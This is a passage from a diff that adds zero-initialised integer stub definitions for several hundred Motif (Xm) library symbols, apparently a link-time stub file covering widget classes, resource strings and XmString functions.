+int _XmSCManTopShadowPixmap = 0;
+int _XmSCMappingDelay = 0;
+int _XmSCMarginBottom = 0;
+int _XmSCMarginHeight = 0;
+int _XmSCMarginLeft = 0;
+int _XmSCMarginRight = 0;
+int _XmSCMarginTop = 0;
+int _XmSCMarginWidth = 0;
+int _XmSCMask = 0;
+int _XmSCMaximum = 0;
+int _XmSCMaxItems = 0;
+int _XmSCMaxLength = 0;
+int _XmSCMaxValue = 0;
+int _XmSCMenuBar = 0;
+int _XmSCMenuPost = 0;
+int _XmSCMenuWidget = 0;
+int _XmSCMessageProc = 0;
+int _XmSCMessageWindow = 0;
+int _XmSCMinimizeButtons = 0;
+int _XmSCMinimum = 0;
+int _XmSCMnemonic = 0;
+int _XmSCMnemonicCharSet = 0;
+int _XmSCMoveOpaque = 0;
+int _XmSCMultiClick = 0;
+int _XmSCMustMatch = 0;
+int _XmSCMwmDecorations = 0;
+int _XmSCMwmFunctions = 0;
+int _XmSCMwmInputMode = 0;
+int _XmSCMwmMenu = 0;
+int _XmSCMwmMessages = 0;
+int _XmSCNavigationType = 0;
+int _XmSCNeedsMotion = 0;
+int _XmSCNoMatchString = 0;
+int _XmSCNoneCursorForeground = 0;
+int _XmSCNoResize = 0;
+int _XmSCNotifyProc = 0;
+int _XmSCNumChildren = 0;
+int _XmSCNumColumns = 0;
+int _XmSCNumDropRectangles = 0;
+int _XmSCNumDropTransfers = 0;
+int _XmSCNumExportTargets = 0;
+int _XmSCNumImportTargets = 0;
+int _XmSCOffset = 0;
+int _XmSCOkLabelString = 0;
+int _XmScolumns = 0;
+int _XmScommand = 0;
+int _XmScommandChangedCallback = 0;
+int _XmScommandEnteredCallback = 0;
+int _XmScommandWindow = 0;
+int _XmScommandWindowLocation = 0;
+int _XmSconvertProc = 0;
+int _XmSCOperationChangedCallback = 0;
+int _XmSCOperationCursorIcon = 0;
+int _XmSCOptionLabel = 0;
+int _XmSCOptionMnemonic = 0;
+int _XmSCOutputCreate = 0;
+int _XmSCPacking = 0;
+int _XmSCPageIncrement = 0;
+int _XmSCPaneMaximum = 0;
+int _XmSCPaneMinimum = 0;
+int _XmSCPattern = 0;
+int _XmSCPendingDelete = 0;
+int _XmSCPopupEnabled = 0;
+int _XmSCPositionIndex = 0;
+int _XmSCPostFromButton = 0;
+int _XmSCPostFromCount = 0;
+int _XmSCPostFromList = 0;
+int _XmSCPreeditType = 0;
+int _XmSCPrimForegroundPixmap = 0;
+int _XmSCProc = 0;
+int _XmSCProcessingDirection = 0;
+int _XmSCPromptString = 0;
+int _XmSCProtocolCallback = 0;
+int _XmSCPushButtonEnabled = 0;
+int _XmSCQualifySearchDataProc = 0;
+int _XmSCRadioAlwaysOne = 0;
+int _XmSCRadioBehavior = 0;
+int _XmSCRecomputeSize = 0;
+int _XmSCRectangleList = 0;
+int _XmSCRectangles = 0;
+int xmScreenClass = 0;
+int xmScreenClassRec = 0;
+int _XmScreenGetOperationIcon = 0;
+int _XmScreenGetSourceIcon = 0;
+int _XmScreenGetStateIcon = 0;
+int xmScreenObjectClass = 0;
+int _XmScreenRemoveFromCursorCache = 0;
+int _XmSCRepeatDelay = 0;
+int _XmSCResizeCallback = 0;
+int _XmSCResizeHeight = 0;
+int _XmSCResizePolicy = 0;
+int _XmSCResizeWidth = 0;
+int xmScrollBarClassRec = 0;
+int _XmScrollBar_defaultTranslations = 0;
+int XmScrollBarGetValues = 0;
+int XmScrollBarSetValues = 0;
+int xmScrollBarWidgetClass = 0;
+int xmScrolledWindowClassRec = 0;
+int XmScrolledWindowSetAreas = 0;
+int xmScrolledWindowWidgetClass = 0;
+int _XmScrolledW_ScrolledWindowXlations = 0;
+int XmScrollVisible = 0;
+int _XmSCRowColumnType = 0;
+int _XmSCRows = 0;
+int _XmSCRubberPositioning = 0;
+int _XmSCSashHeight = 0;
+int _XmSCSashIndent = 0;
+int _XmSCSashWidth = 0;
+int _XmSCScaleHeight = 0;
+int _XmSCScaleMultiple = 0;
+int _XmSCScaleWidth = 0;
+int _XmSCScroll = 0;
+int _XmSCScrollBarDisplayPolicy = 0;
+int _XmSCScrollBarPlacement = 0;
+int _XmSCScrolledWindowMarginHeight = 0;
+int _XmSCScrolledWindowMarginWidth = 0;
+int _XmSCScrollingPolicy = 0;
+int _XmSCScrollSide = 0;
+int _XmSCSelectColor = 0;
+int _XmSCSelectedItemCount = 0;
+int _XmSCSelectedItems = 0;
+int _XmSCSelectInsensitivePixmap = 0;
+int _XmSCSelectionArrayCount = 0;
+int _XmSCSelectionLabelString = 0;
+int _XmSCSelectionPolicy = 0;
+int _XmSCSelectionType = 0;
+int _XmSCSelectPixmap = 0;
+int _XmSCSelectThreshold = 0;
+int _XmSCSeparatorOn = 0;
+int _XmSCSeparatorType = 0;
+int _XmSCSet = 0;
+int _XmSCShadowThickness = 0;
+int _XmSCShadowType = 0;
+int _XmSCShellHorizDim = 0;
+int _XmSCShellHorizPos = 0;
+int _XmSCShellUnitType = 0;
+int _XmSCShellVertDim = 0;
+int _XmSCShellVertPos = 0;
+int _XmSCShowArrows = 0;
+int _XmSCShowAsDefault = 0;
+int _XmSCShowSeparator = 0;
+int _XmSCShowValue = 0;
+int _XmSCSimpleCheckBox = 0;
+int _XmSCSimpleMenuBar = 0;
+int _XmSCSimpleOptionMenu = 0;
+int _XmSCSimplePopupMenu = 0;
+int _XmSCSimplePulldownMenu = 0;
+int _XmSCSimpleRadioBox = 0;
+int _XmSCSizePolicy = 0;
+int _XmSCSliderSize = 0;
+int _XmSCSource = 0;
+int _XmSCSourceCursorIcon = 0;
+int _XmSCSourceIsExternal = 0;
+int _XmSCSourcePixmapIcon = 0;
+int _XmSCSourceWidget = 0;
+int _XmSCSourceWindow = 0;
+int _XmSCSpacing = 0;
+int _XmSCStartTime = 0;
+int _XmSCStateCursorIcon = 0;
+int _XmSCStringDirection = 0;
+int _XmSCTearOffModel = 0;
+int _XmSCTextFontList = 0;
+int _XmSCTextString = 0;
+int _XmSCTextValue = 0;
+int _XmSCTitleString = 0;
+int _XmSCTopCharacter = 0;
+int _XmSCTopItemPosition = 0;
+int _XmSCTopLevelEnterCallback = 0;
+int _XmSCTopLevelLeaveCallback = 0;
+int _XmSCTopShadowColor = 0;
+int _XmSCTopShadowPixmap = 0;
+int _XmSCTransferProc = 0;
+int _XmSCTransferStatus = 0;
+int _XmSCTraversalOn = 0;
+int _XmSCTraversalType = 0;
+int _XmSCTreeUpdateProc = 0;
+int _XmSCTroughColor = 0;
+int _XmSCUnitType = 0;
+int _XmSCUnpostBehavior = 0;
+int _XmSCUnselectPixmap = 0;
+int _XmSCUpdateSliderSize = 0;
+int _XmScursorBackground = 0;
+int _XmScursorForeground = 0;
+int _XmScursorPosition = 0;
+int _XmScursorPositionVisible = 0;
+int _XmSCUseAsyncGeometry = 0;
+int _XmSCUserData = 0;
+int _XmSCValidCursorForeground = 0;
+int _XmSCValueChangedCallback = 0;
+int _XmSCValueWcs = 0;
+int _XmSCVerifyBell = 0;
+int _XmSCVerticalAlignment = 0;
+int _XmSCVerticalDimension = 0;
+int _XmSCVerticalFontUnit = 0;
+int _XmSCVerticalInt = 0;
+int _XmSCVerticalPosition = 0;
+int _XmSCVerticalScrollBar = 0;
+int _XmSCVirtualBinding = 0;
+int _XmSCVisibleItemCount = 0;
+int _XmSCVisibleWhenOff = 0;
+int _XmSCVisualPolicy = 0;
+int _XmSCWhichButton = 0;
+int _XmSCWordWrap = 0;
+int _XmSCWorkWindow = 0;
+int _XmSCXmBackgroundPixmap = 0;
+int _XmSCXmFONTLIST_DEFAULT_TAG_STRING = 0;
+int _XmSCXmString = 0;
+int _XmSCXmStringCharSet = 0;
+int _XmSCXmStringTable = 0;
+int _XmSdarkThreshold = 0;
+int _XmSdecimalPoints = 0;
+int _XmSdecrementCallback = 0;
+int _XmSdefaultActionCallback = 0;
+int _XmSDEFAULT_BACKGROUND = 0;
+int _XmSdefaultButton = 0;
+int _XmSdefaultButtonShadowThickness = 0;
+int _XmSdefaultButtonType = 0;
+int _XmSdefaultCopyCursorIcon = 0;
+int _XmSDEFAULT_FONT = 0;
+int _XmSdefaultFontList = 0;
+int _XmSdefaultInvalidCursorIcon = 0;
+int _XmSdefaultLinkCursorIcon = 0;
+int _XmSdefaultMoveCursorIcon = 0;
+int _XmSdefaultNoneCursorIcon = 0;
+int _XmSdefaultPosition = 0;
+int _XmSdefaultSourceCursorIcon = 0;
+int _XmSdefaultValidCursorIcon = 0;
+int _XmSdeleteResponse = 0;
+int _XmSdesktopParent = 0;
+int _XmSdialogStyle = 0;
+int _XmSdialogTitle = 0;
+int _XmSdialogType = 0;
+int _XmSdirectory = 0;
+int _XmSdirectoryValid = 0;
+int _XmSdirListItemCount = 0;
+int _XmSdirListItems = 0;
+int _XmSdirListLabelString = 0;
+int _XmSdirMask = 0;
+int _XmSdirSearchProc = 0;
+int _XmSdirSpec = 0;
+int _XmSdisarmCallback = 0;
+int _XmSdoubleClickInterval = 0;
+int _XmSdoubleSeparator = 0;
+int _XmSdragCallback = 0;
+int _XmSdragContextClass = 0;
+int _XmSdragDropFinishCallback = 0;
+int _XmSdragIconClass = 0;
+int _XmSdragInitiatorProtocolStyle = 0;
+int _XmSdragMotionCallback = 0;
+int _XmSdragOperations = 0;
+int _XmSdragOverMode = 0;
+int _XmSdragProc = 0;
+int _XmSdragReceiverProtocolStyle = 0;
+int _XmSdropFinishCallback = 0;
+int _XmSdropProc = 0;
+int _XmSdropRectangles = 0;
+int _XmSdropSiteActivity = 0;
+int _XmSdropSiteEnterCallback = 0;
+int _XmSdropSiteLeaveCallback = 0;
+int _XmSdropSiteManagerClass = 0;
+int _XmSdropSiteOperations = 0;
+int _XmSdropSiteType = 0;
+int _XmSdropStartCallback = 0;
+int _XmSdropTransferClass = 0;
+int _XmSdropTransfers = 0;
+int _XmSearchColorCache = 0;
+int _XmSecondaryResourceData = 0;
+int _XmSeditable = 0;
+int _XmSeditMode = 0;
+int _XmSelectColorDefault = 0;
+int _XmSelectioB_defaultTextAccelerators = 0;
+int xmSelectionBoxClassRec = 0;
+int _XmSelectionBoxCreateApplyButton = 0;
+int _XmSelectionBoxCreateCancelButton = 0;
+int _XmSelectionBoxCreateHelpButton = 0;
+int _XmSelectionBoxCreateList = 0;
+int _XmSelectionBoxCreateListLabel = 0;
+int _XmSelectionBoxCreateOkButton = 0;
+int _XmSelectionBoxCreateSelectionLabel = 0;
+int _XmSelectionBoxCreateSeparator = 0;
+int _XmSelectionBoxCreateText = 0;
+int _XmSelectionBoxGeoMatrixCreate = 0;
+int _XmSelectionBoxGetApplyLabelString = 0;
+int _XmSelectionBoxGetCancelLabelString = 0;
+int XmSelectionBoxGetChild = 0;
+int _XmSelectionBoxGetHelpLabelString = 0;
+int _XmSelectionBoxGetListItemCount = 0;
+int _XmSelectionBoxGetListItems = 0;
+int _XmSelectionBoxGetListLabelString = 0;
+int _XmSelectionBoxGetListVisibleItemCount = 0;
+int _XmSelectionBoxGetOkLabelString = 0;
+int _XmSelectionBoxGetSelectionLabelString = 0;
+int _XmSelectionBoxGetTextColumns = 0;
+int _XmSelectionBoxGetTextString = 0;
+int _XmSelectionBoxNoGeoRequest = 0;
+int _XmSelectionBoxRestore = 0;
+int _XmSelectionBoxUpOrDown = 0;
+int xmSelectionBoxWidgetClass = 0;
+int _XmSEMPTY_STRING = 0;
+int _XmSendICCCallback = 0;
+int _XmSentryAlignment = 0;
+int _XmSentryBorder = 0;
+int _XmSentryCallback = 0;
+int _XmSentryClass = 0;
+int _XmSentryVerticalAlignment = 0;
+int _XmSeparatorCacheCompare = 0;
+int xmSeparatorClassRec = 0;
+int _XmSeparatorFix = 0;
+int xmSeparatorGadgetClass = 0;
+int xmSeparatorGadgetClassRec = 0;
+int xmSeparatorGCacheObjClassRec = 0;
+int xmSeparatorWidgetClass = 0;
+int _XmSetActiveTabGroup = 0;
+int _XmSetActualClass = 0;
+int XmSetColorCalculation = 0;
+int _XmSetDefaultBackgroundColorSpec = 0;
+int _XmSetDestination = 0;
+int _XmSetDragReceiverInfo = 0;
+int _XmSetEtchedSlider = 0;
+int _XmSetFocusFlag = 0;
+int _XmSetFocusResetFlag = 0;
+int XmSetFontUnit = 0;
+int XmSetFontUnits = 0;
+int _XmSetInDragMode = 0;
+int _XmSetInitialOfTabGraph = 0;
+int _XmSetInitialOfTabGroup = 0;
+int _XmSetKidGeo = 0;
+int _XmSetLastManagedMenuTime = 0;
+int XmSetMenuCursor = 0;
+int _XmSetMenuTraversal = 0;
+int _XmSetPopupMenuClick = 0;
+int XmSetProtocolHooks = 0;
+int _XmSetRect = 0;
+int _XmSetSwallowEventHandler = 0;
+int _XmSetThickness = 0;
+int _XmSetThicknessDefault0 = 0;
+int XmSetToolTipString = 0;
+int _XmSetTransientFlag = 0;
+int _XmSetValuesOnChildren = 0;
+int _XmSetXmDisplayClass = 0;
+int _XmSexportTargets = 0;
+int _XmSexposeCallback = 0;
+int _XmSextendedSelectionCallback = 0;
+int _XmSextensionType = 0;
+int _XmSFAddNavigator = 0;
+int _XmSfileListItemCount = 0;
+int _XmSfileListItems = 0;
+int _XmSfileListLabelString = 0;
+int _XmSfileSearchProc = 0;
+int _XmSfileTypeMask = 0;
+int _XmSfillOnArm = 0;
+int _XmSfillOnSelect = 0;
+int _XmSfilterLabelString = 0;
+int _XmSfocusCallback = 0;
+int _XmSfocusMovedCallback = 0;
+int _XmSfocusPolicyChanged = 0;
+int _XmSfontList = 0;
+int _XmSforegroundThreshold = 0;
+int _XmSfractionBase = 0;
+int _XmSFRemoveNavigator = 0;
+int _XmSFUpdateNavigatorsValue = 0;
+int _XmSgainPrimaryCallback = 0;
+int xmShellExtClassRec = 0;
+int xmShellExtObjectClass = 0;
+int _XmShellIsExclusive = 0;
+int _XmShelpCallback = 0;
+int _XmShelpLabelString = 0;
+int _XmShighlightColor = 0;
+int _XmShighlightOnEnter = 0;
+int _XmShighlightPixmap = 0;
+int _XmShighlightThickness = 0;
+int _XmShistoryItemCount = 0;
+int _XmShistoryItems = 0;
+int _XmShistoryMaxItems = 0;
+int _XmShistoryVisibleItemCount = 0;
+int _XmShorizontalFontUnit = 0;
+int _XmShorizontalScrollBar = 0;
+int _XmShorizontalSpacing = 0;
+int _XmShotX = 0;
+int _XmShotY = 0;
+int _XmSiccHandle = 0;
+int XmSimpleSpinBoxAddItem = 0;
+int xmSimpleSpinBoxClassRec = 0;
+int XmSimpleSpinBoxDeletePos = 0;
+int XmSimpleSpinBoxSetItem = 0;
+int xmSimpleSpinBoxWidgetClass = 0;
+int _XmSimportTargets = 0;
+int _XmSincrement = 0;
+int _XmSincremental = 0;
+int _XmSincrementCallback = 0;
+int _XmSindicatorOn = 0;
+int _XmSindicatorSize = 0;
+int _XmSindicatorType = 0;
+int _XmSinitialDelay = 0;
+int _XmSinitialFocus = 0;
+int _XmSinputCallback = 0;
+int _XmSinputCreate = 0;
+int _XmSinputMethod = 0;
+int _XmSinvalidCursorForeground = 0;
+int _XmSisAligned = 0;
+int _XmSisHomogeneous = 0;
+int _XmSitemCount = 0;
+int _XmSitems = 0;
+int _XmSkeyboardFocusPolicy = 0;
+int _XmSlabelFontList = 0;
+int _XmSlabelInsensitivePixmap = 0;
+int _XmSlabelPixmap = 0;
+int _XmSlabelString = 0;
+int _XmSlabelType = 0;
+int _XmSleep = 0;
+int _XmSleftAttachment = 0;
+int _XmSleftOffset = 0;
+int _XmSleftPosition = 0;
+int _XmSleftWidget = 0;
+int xmSlideContextClassRec = 0;
+int xmSlideContextWidgetClass = 0;
+int _XmSlightThreshold = 0;
+int _XmSlistItemCount = 0;
+int _XmSlistItems = 0;
+int _XmSlistLabelString = 0;
+int _XmSlistMarginHeight = 0;
+int _XmSlistMarginWidth = 0;
+int _XmSlistSizePolicy = 0;
+int _XmSlistSpacing = 0;
+int _XmSlistUpdated = 0;
+int _XmSlistVisibleItemCount = 0;
+int _XmSlogicalParent = 0;
+int _XmSlosePrimaryCallback = 0;
+int _XmSlosingFocusCallback = 0;
+int _XmSmainWindowMarginHeight = 0;
+int _XmSmainWindowMarginWidth = 0;
+int _XmSmapCallback = 0;
+int _XmSmappingDelay = 0;
+int _XmSmargin = 0;
+int _XmSmarginBottom = 0;
+int _XmSmarginHeight = 0;
+int _XmSmarginLeft = 0;
+int _XmSmarginRight = 0;
+int _XmSmarginTop = 0;
+int _XmSmarginWidth = 0;
+int _XmSmask = 0;
+int _XmSmaximum = 0;
+int _XmSmaxLength = 0;
+int _XmSmenuAccelerator = 0;
+int _XmSmenuBar = 0;
+int _XmSmenuCursor = 0;
+int _XmSmenuHelpWidget = 0;
+int _XmSmenuHistory = 0;
+int _XmSmenuPost = 0;
+int _XmSmessageAlignment = 0;
+int _XmSmessageProc = 0;
+int _XmSmessageString = 0;
+int _XmSmessageWindow = 0;
+int _XmSminimizeButtons = 0;
+int _XmSminimum = 0;
+int _XmSmnemonic = 0;
+int _XmSmnemonicCharSet = 0;
+int _XmSmodifyVerifyCallback = 0;
+int _XmSmodifyVerifyCallbackWcs = 0;
+int _XmSmotionVerifyCallback = 0;
+int _XmSmoveOpaque = 0;
+int _XmSmultiClick = 0;
+int _XmSmultipleSelectionCallback = 0;
+int _XmSmustMatch = 0;
+int _XmSmwmDecorations = 0;
+int _XmSmwmFunctions = 0;
+int _XmSmwmInputMode = 0;
+int _XmSmwmMenu = 0;
+int _XmSmwmMessages = 0;
+int _XmSnavigationType = 0;
+int _XmSneedsMotion = 0;
+int _XmSnoMatchCallback = 0;
+int _XmSnoMatchString = 0;
+int _XmSnoneCursorForeground = 0;
+int _XmSnoResize = 0;
+int _XmSnotifyProc = 0;
+int _XmSnumColumns = 0;
+int _XmSnumDropRectangles = 0;
+int _XmSnumDropTransfers = 0;
+int _XmSnumExportTargets = 0;
+int _XmSnumImportTargets = 0;
+int _XmSnumRectangles = 0;
+int _XmSocorro = 0;
+int _XmSoffsetX = 0;
+int _XmSoffsetY = 0;
+int _XmSokCallback = 0;
+int _XmSokLabelString = 0;
+int _XmSoperationChangedCallback = 0;
+int _XmSoperationCursorIcon = 0;
+int _XmSoptionLabel = 0;
+int _XmSoptionMnemonic = 0;
+int _XmSortResourceList = 0;
+int _XmSosfActivate = 0;
+int _XmSosfAddMode = 0;
+int _XmSosfBackSpace = 0;
+int _XmSosfBeginLine = 0;
+int _XmSosfCancel = 0;
+int _XmSosfClear = 0;
+int _XmSosfCopy = 0;
+int _XmSosfCut = 0;
+int _XmSosfDelete = 0;
+int _XmSosfDown = 0;
+int _XmSosfEndLine = 0;
+int _XmSosfHelp = 0;
+int _XmSosfInsert = 0;
+int _XmSosfLeft = 0;
+int _XmSosfMenu = 0;
+int _XmSosfMenuBar = 0;
+int _XmSosfPageDown = 0;
+int _XmSosfPageLeft = 0;
+int _XmSosfPageRight = 0;
+int _XmSosfPageUp = 0;
+int _XmSosfPaste = 0;
+int _XmSosfPrimaryPaste = 0;
+int _XmSosfQuickPaste = 0;
+int _XmSosfRight = 0;
+int _XmSosfSelect = 0;
+int _XmSosfUndo = 0;
+int _XmSosfUp = 0;
+int _XmSoutputCreate = 0;
+int _XmSpacking = 0;
+int _XmSpageDecrementCallback = 0;
+int _XmSpageIncrement = 0;
+int _XmSpageIncrementCallback = 0;
+int _XmSpaneMaximum = 0;
+int _XmSpaneMinimum = 0;
+int _XmSpattern = 0;
+int _XmSpendingDelete = 0;
+int _XmSpinB_defaultAccelerators = 0;
+int _XmSpinB_defaultTranslations = 0;
+int xmSpinBoxClassRec = 0;
+int XmSpinBoxValidatePosition = 0;
+int xmSpinBoxWidgetClass = 0;
+int _XmSpopupEnabled = 0;
+int _XmSpositionIndex = 0;
+int _XmSpostFromButton = 0;
+int _XmSpostFromCount = 0;
+int _XmSpostFromList = 0;
+int _XmSpreeditType = 0;
+int _XmSprocessingDirection = 0;
+int _XmSpromptString = 0;
+int _XmSprotocolCallback = 0;
+int _XmSpushButton = 0;
+int _XmSpushButtonEnabled = 0;
+int _XmSqualifySearchDataProc = 0;
+int _XmSradioAlwaysOne = 0;
+int _XmSradioBehavior = 0;
+int _XmSradioButton = 0;
+int _XmSrealizeCallback = 0;
+int _XmSrecomputeSize = 0;
+int _XmSrectangles = 0;
+int _XmSrefigureMode = 0;
+int _XmSrepeatDelay = 0;
+int _XmSresizable = 0;
+int _XmSresizeCallback = 0;
+int _XmSresizeHeight = 0;
+int _XmSresizePolicy = 0;
+int _XmSresizeWidth = 0;
+int _XmSrightAttachment = 0;
+int _XmSrightOffset = 0;
+int _XmSrightPosition = 0;
+int _XmSrightWidget = 0;
+int _XmSrowColumnType = 0;
+int _XmSrows = 0;
+int _XmSrubberPositioning = 0;
+int _XmSsashHeight = 0;
+int _XmSsashIndent = 0;
+int _XmSsashShadowThickness = 0;
+int _XmSsashWidth = 0;
+int _XmSscaleHeight = 0;
+int _XmSscaleMultiple = 0;
+int _XmSscaleWidth = 0;
+int _XmSscrollBarDisplayPolicy = 0;
+int _XmSscrollBarPlacement = 0;
+int _XmSscrolledWindowMarginHeight = 0;
+int _XmSscrolledWindowMarginWidth = 0;
+int _XmSscrollHorizontal = 0;
+int _XmSscrollingPolicy = 0;
+int _XmSscrollLeftSide = 0;
+int _XmSscrollTopSide = 0;
+int _XmSscrollVertical = 0;
+int _XmSselectColor = 0;
+int _XmSselectedItemCount = 0;
+int _XmSselectedItems = 0;
+int _XmSselectInsensitivePixmap = 0;
+int _XmSselectionArrayCount = 0;
+int _XmSselectionLabelString = 0;
+int _XmSselectionPolicy = 0;
+int _XmSselectPixmap = 0;
+int _XmSselectThreshold = 0;
+int _XmSseparator = 0;
+int _XmSseparatorOn = 0;
+int _XmSseparatorType = 0;
+int _XmSset = 0;
+int _XmSshadow = 0;
+int _XmSshadowThickness = 0;
+int _XmSshadowType = 0;
+int _XmSshellUnitType = 0;
+int _XmSshowArrows = 0;
+int _XmSshowAsDefault = 0;
+int _XmSshowSeparator = 0;
+int _XmSshowValue = 0;
+int _XmSsimpleCallback = 0;
+int _XmSsingleSelectionCallback = 0;
+int _XmSsingleSeparator = 0;
+int _XmSsizePolicy = 0;
+int _XmSskipAdjust = 0;
+int _XmSsliderSize = 0;
+int _XmSsource = 0;
+int _XmSsourceCursorIcon = 0;
+int _XmSsourceIsExternal = 0;
+int _XmSsourcePixmapIcon = 0;
+int _XmSsourceWidget = 0;
+int _XmSsourceWindow = 0;
+int _XmSspacing = 0;
+int _XmSstartTime = 0;
+int _XmSstateCursorIcon = 0;
+int _XmSstringDirection = 0;
+int _XmSsubMenuId = 0;
+int _XmSsymbolPixmap = 0;
+int _XmStackFree = 0;
+int _XmStackInit = 0;
+int _XmStackPop = 0;
+int _XmStackPush = 0;
+int xm_std_constraint_filter = 0;
+int xm_std_filter = 0;
+int _XmStearOffMenuActivateCallback = 0;
+int _XmStearOffMenuDeactivateCallback = 0;
+int _XmStearOffModel = 0;
+int _XmStextAccelerators = 0;
+int _XmStextColumns = 0;
+int _XmStextFontList = 0;
+int _XmStextString = 0;
+int _XmStextTranslations = 0;
+int _XmStextValue = 0;
+int _XmStitleString = 0;
+int _XmStoBottomCallback = 0;
+int _XmStopAttachment = 0;
+int _XmStopCharacter = 0;
+int _XmStopItemPosition = 0;
+int _XmStopLevelEnterCallback = 0;
+int _XmStopLevelLeaveCallback = 0;
+int _XmStopOffset = 0;
+int _XmStoPositionCallback = 0;
+int _XmStopPosition = 0;
+int _XmStopShadowColor = 0;
+int _XmStopShadowPixmap = 0;
+int _XmStopWidget = 0;
+int _XmStoTopCallback = 0;
+int _XmStransferProc = 0;
+int _XmStransferStatus = 0;
+int _XmStraversalCallback = 0;
+int _XmStraversalOn = 0;
+int _XmStraversalType = 0;
+int _XmStraverseObscuredCallback = 0;
+int _XmStreeUpdateProc = 0;
+int _XmStringBaseline = 0;
+int XmStringBaseline = 0;
+int _XmStringByteCompare = 0;
+int XmStringByteCompare = 0;
+int XmStringByteStreamLength = 0;
+int _XmStringCacheFree = 0;
+int _XmStringCacheGet = 0;
+int _XmStringCacheTag = 0;
+int _XmStringCharacterCount = 0;
+int XmStringCompare = 0;
+int XmStringComponentCreate = 0;
+int XmStringConcat = 0;
+int XmStringConcatAndFree = 0;
+int _XmStringContextCopy = 0;
+int _XmStringContextFree = 0;
+int _XmStringContextReInit = 0;
+int _XmStringCopy = 0;
+int XmStringCopy = 0;
+int _XmStringCreate = 0;
+int XmStringCreate = 0;
+int _XmStringCreateExternal = 0;
+int XmStringCreateFontList = 0;
+int XmStringCreateFontList_r = 0;
+int XmStringCreateLocalized = 0;
+int XmStringCreateLtoR = 0;
+int XmStringCreateSimple = 0;
+int XmStringDirectionCreate = 0;
+int XmStringDirectionToDirection = 0;
+int _XmStringDraw = 0;
+int XmStringDraw = 0;
+int _XmStringDrawImage = 0;
+int XmStringDrawImage = 0;
+int _XmStringDrawLining = 0;
+int _XmStringDrawMnemonic = 0;
+int _XmStringDrawSegment = 0;
+int _XmStringDrawUnderline = 0;
+int XmStringDrawUnderline = 0;
+int _XmStringEmpty = 0;
+int XmStringEmpty = 0;
+int _XmStringEntryCopy = 0;
+int _XmStringEntryFree = 0;
+int _XmStringExtent = 0;
+int XmStringExtent = 0;
+int _XmStringFree = 0;
+int XmStringFree = 0;
+int _XmStringFreeContext = 0;
+int XmStringFreeContext = 0;
+int XmStringGenerate = 0;
+int _XmStringGetBaselines = 0;
+int _XmStringGetCurrentCharset = 0;
+int XmStringGetLtoR = 0;
+int XmStringGetNextComponent = 0;
+int _XmStringGetNextSegment = 0;
+int XmStringGetNextSegment = 0;
+int _XmStringGetNextTabWidth = 0;
+int XmStringGetNextTriple = 0;
+int _XmStringGetSegment = 0;
+int _XmStringGetTextConcat = 0;
+int _XmStringHasSubstring = 0;
+int XmStringHasSubstring = 0;
+int _XmStringHeight = 0;
+int XmStringHeight = 0;
+int _XmStringIndexCacheTag = 0;
+int _XmStringIndexGetTag = 0;
+int _XmStringInitContext = 0;
+int XmStringInitContext = 0;
+int _XmStringIsCurrentCharset = 0;
+int XmStringIsVoid = 0;
+int _XmStringIsXmString = 0;
+int _XmStringLayout = 0;
+int XmStringLength = 0;
+int _XmStringLineCount = 0;
+int XmStringLineCount = 0;
+int XmStringLtoRCreate = 0;
+int XmStringNConcat = 0;
+int XmStringNCopy = 0;
+int _XmStringNCreate = 0;
+int _XmStringOptToNonOpt = 0;
+int XmStringParseText = 0;
+int XmStringPeekNextComponent = 0;
+int XmStringPeekNextTriple = 0;
+int XmStringPutRendition = 0;
+int _XmStringRender = 0;
+int _XmStrings = 0;
+int _XmStrings22 = 0;
+int _XmStrings23 = 0;
+int _XmStringsAreEqual = 0;
+int XmStringSegmentCreate = 0;
+int _XmStringSegmentExtents = 0;
+int _XmStringSegmentNew = 0;
+int XmStringSeparatorCreate = 0;
+int _XmStringsI = 0;
+int _XmStringSingleSegment = 0;
+int _XmStringSourceCreate = 0;
+int _XmStringSourceDestroy = 0;
+int _XmStringSourceFindString = 0;
+int _XmStringSourceGetEditable = 0;
+int _XmStringSourceGetMaxLength = 0;
+int _XmStringSourceGetPending = 0;
+int _XmStringSourceGetString = 0;
+int _XmStringSourceGetValue = 0;
+int _XmStringSourceHasSelection = 0;
+int _XmStringSourceSetEditable = 0;
+int _XmStringSourceSetGappedBuffer = 0;
+int _XmStringSourceSetMaxLength = 0;
+int _XmStringSourceSetPending = 0;
+int _XmStringSourceSetValue = 0;
+int XmStringTableParseStringArray = 0;
+int XmStringTableProposeTablist = 0;
+int XmStringTableToXmString = 0;
+int XmStringTableUnparse = 0;
+int XmStringToXmStringTable = 0;
+int _XmStringTruncateASN1 = 0;
+int _XmStringUngenerate = 0;
+int XmStringUnparse = 0;
+int _XmStringUpdate = 0;
+int _XmStringUpdateWMShellTitle = 0;
+int _XmStringWidth = 0;
+int XmStringWidth = 0;
+int _XmStroughColor = 0;
+int _XmSunitType = 0;
+int _XmSunmapCallback = 0;
+int _XmSunpostBehavior = 0;
+int _XmSunselectPixmap = 0;
+int _XmSupdateSliderSize = 0;
+int _XmSuseAsyncGeometry = 0;
+int _XmSuserData = 0;
+int _XmSvalidCursorForeground = 0;
+int _XmSvalueChangedCallback = 0;
+int _XmSvalueWcs = 0;
+int _XmSverifyBell = 0;
+int _XmSverticalFontUnit = 0;
+int _XmSverticalScrollBar = 0;
+int _XmSverticalSpacing = 0;
+int _XmSvisibleItemCount = 0;
+int _XmSvisibleWhenOff = 0;
+int _XmSvisualPolicy = 0;
+int _XmSWGetClipArea = 0;
+int _XmSwhichButton = 0;
+int _XmSWNotifyGeoChange = 0;
+int _XmSwordWrap = 0;
+int _XmSworkWindow = 0;
+int _XmSyncDropSiteTree = 0;
+int XmTabAttributesFree = 0;
+int XmTabbedStackListAppend = 0;
+int _XmTabbedStackListArray = 0;
+int XmTabbedStackListCompare = 0;
+int XmTabbedStackListCopy = 0;
+int _XmTabbedStackListCount = 0;
+int XmTabbedStackListCreate = 0;
+int XmTabbedStackListFind = 0;
+int XmTabbedStackListFree = 0;
+int _XmTabbedStackListGet = 0;
+int XmTabbedStackListInsert = 0;
+int XmTabbedStackListModify = 0;
+int XmTabbedStackListQuery = 0;
+int XmTabbedStackListRemove = 0;
+int XmTabbedStackListSimpleAppend = 0;
+int XmTabbedStackListSimpleInsert = 0;
+int XmTabbedStackListSimpleModify = 0;
+int XmTabbedStackListSimpleQuery = 0;
+int XmTabbedStackListSimpleRemove = 0;
+int _XmTabBoxCanvas = 0;
+int xmTabBoxClassRec = 0;
+int XmTabBoxGetIndex = 0;
+int _XmTabBoxGetMaxTabHeight = 0;
+int _XmTabBoxGetMaxTabWidth = 0;
+int XmTabBoxGetNumColumns = 0;
